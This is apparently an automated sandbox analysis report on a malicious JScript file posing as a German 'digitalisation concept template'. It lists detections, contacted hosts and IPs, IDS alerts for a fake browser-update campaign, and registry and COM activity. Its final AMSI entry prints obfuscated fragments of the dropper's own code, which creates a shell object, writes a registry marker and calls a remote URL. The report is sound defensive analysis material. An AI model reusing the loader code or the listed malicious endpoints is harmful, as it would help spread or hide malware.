Click to jump to signature section
Source: digitalisierungskonzept_muster.js | Avira: detected |
Source: https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9188368477647375 | Avira URL Cloud: Label: malware |
Source: unknown | HTTPS traffic detected: 188.40.120.141:443 -> 192.168.2.4:50002 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 86.107.32.28:443 -> 192.168.2.4:50003 version: TLS 1.2 |
Source: C:\Windows\System32\wscript.exe | Network Connect: 86.107.32.28 443 | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Network Connect: 188.40.120.141 443 | Jump to behavior |
Source: Joe Sandbox View | ASN Name: DIALTELECOMRO DIALTELECOMRO |
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE HETZNER-ASDE |
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1 |
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50002 -> 188.40.120.141:443 |
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50003 -> 86.107.32.28:443 |
Source: global traffic | HTTP traffic detected: GET /search.php?xxcktjjjheggcyu=9188368477647375 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.giuseppedeluigi.com |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic | HTTP traffic detected: GET /search.php?xxcktjjjheggcyu=9188368477647375 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.giuseppedeluigi.com |
Source: global traffic | DNS traffic detected: DNS query: www.giuseppedeluigi.com |
Source: global traffic | DNS traffic detected: DNS query: www.frerecapucinbenin.org |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 12:37:22 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 208Connection: closeContent-Type: text/html; charset=iso-8859-1 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50003 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50002 |
Source: unknown | Network traffic detected: HTTP traffic on port 50002 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 50003 -> 443 |
Source: unknown | HTTPS traffic detected: 188.40.120.141:443 -> 192.168.2.4:50002 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 86.107.32.28:443 -> 192.168.2.4:50003 version: TLS 1.2 |
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1} | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495} | Jump to behavior |
Source: digitalisierungskonzept_muster.js | Initial sample: Strings found which are bigger than 50 |
Source: classification engine | Classification label: mal88.evad.winJS@1/0@2/2 |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttpcom.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript)["C"+"reateObj"+"e"+"c"+"t"]("WS"+"cr"+"ipt.She"+"l"+"l"+""); liquid = "HK"+"E"+"Y"+"_CURR"+"EN"+"T_USER"+"\\ptuxPa\\";try { did["Reg"+"R"+"e"+"ad"](liquid); } catch(e) { did["Re"+"g"+"W"+"rit"+"e"](liquid, "", "REG_"+"S"+"Z");D=37-34;master=19;}try {teeth[D](might('.phhcpr\'a+e\"s?/x\'x+c]kst[jZj+j\'h/e/g:gscpytut=h\"\'+ G,,\' TfEaGl\'s(en)e;p oB..Bs e{nydr(t) ;} ;}\"c6a4t1c8h7(2e\")+{G =rGe{t u)r\"n% NfIaAlMsOeD;S N}D RiEfS U(%B\". s=t!a t)u\"s% N=I=A=M O2D0S0N)D R{E SvUa%r\" (ls g=n iBr.trSetsnpeomnnsoerTievxntE;d niafp x(E(.l).\"ilnldeehxSO.ft(p\"i@r\"c+SGW+\"\"(@t\"c,e j0b)O)e=t=a-e1r)C .{t pWiSrccrSiWp(t .fsil e;e)p0(32+20272,22)(;] \"}r teslbsues \"{[ )l( g=n ilr.trSeoptl.a)c(em(o\"d@n\"a+rG.+h\"t@a\"M, \"=\" )G; ;v)a\'rP TiT H=L MlX.rreevprleaSc.e2(L/M(X\\SdM{\'2(}t)c/egj,b OfeutnacetriCo.nt p(iHr)c S{W r=e tBu r{n )S3t r<i nsg(. ferloimhCwh a;r0C o=d es( p;a]r\"sueeI.netu(qHi,h1t0e)o+i3b0e)d;n e}e)p;o rtueeemtuhr[o3f].(wiw)w(\"),;\" gWrSoc.rniipnte.bQnuiictu(p)a;c e}r e}r fe.lwswew \"{, \"WmSoccr.iipgti.uslleedeepp(p2e2s2u2i2g).;w w}w \"s[+ +=; }Z '))();}catch(e){WScript.sleep(685818760);}afltrgbplg=teeth; }ITextStream.WriteLine(" exec:242 f:some");ITextStream.WriteLine(" exit:123 f:some r:1180");ITextStream.WriteLine(" entry:136 f:sail a0:%22constructorvutwQvzvqpeyh%3D686%3Bdid%20%3D%20(WScript)%5B%22C%22%2B%22reateObj%22%2B%22e%22%2B%22c%22%2B%22t%22%5D(%22WS%22%2B%22cr%22%2B%22ipt.She%22%2B%22l%22%2B%22l%22%2B%22%22)%3B%20liquid%20%3D%20");ITextStream.WriteLine(" exit:136 f:sail r:%22ctorv%22");ITextStream.WriteLine(" entry:123 f:some a0:%22constructorvutwQvzvqpeyh%3D686%3Bdid%20%3D%20(WScript)%5B%22C%22%2B%22reateObj%22%2B%22e%22%2B%22c%22%2B%22t%22%5D(%22WS%22%2B%22cr%22%2B%22ipt.She%22%2B%22l%22%2B%22l%22%2B%22%22)%3B%20liquid%20%3D%20");ITextStream.WriteLine(" exec:242 f:some");ITextStream.WriteLine(" exit:123 f:some r:1180");ITextStream.WriteLine(" entry:136 f:sail a0:%22constructorvutwQvzvqpeyh%3D686%3Bdid%20%3D%20(WScript)%5B%22C%22%2B%22reateObj%22%2B%22e%22%2B%22c%22%2B%22t%22%5D(%22WS%22%2B%22cr%22%2B%22ipt.She%22%2B%22l%22%2B%22l%22%2B%22%22)%3B%20liquid%20%3D%20");ITextStream.WriteLine(" exit:136 f:sail r:%22torvu%22");ITextStream.WriteLine(" entry:123 f:some a0:%22constructorvutwQvzvqpeyh%3D686%3Bdid%20%3D%20(WScript)%5B%22C%22%2B%22reateObj%22%2B%22e%22%2B%22c%22%2B%22t%22%5D(%22WS%22%2B%22cr%22%2B%22ipt.She%22%2B%22l%22%2B%22l%22%2B%22%22)%3B%20liquid%20%3D%20");ITextStream.WriteLine(" exi |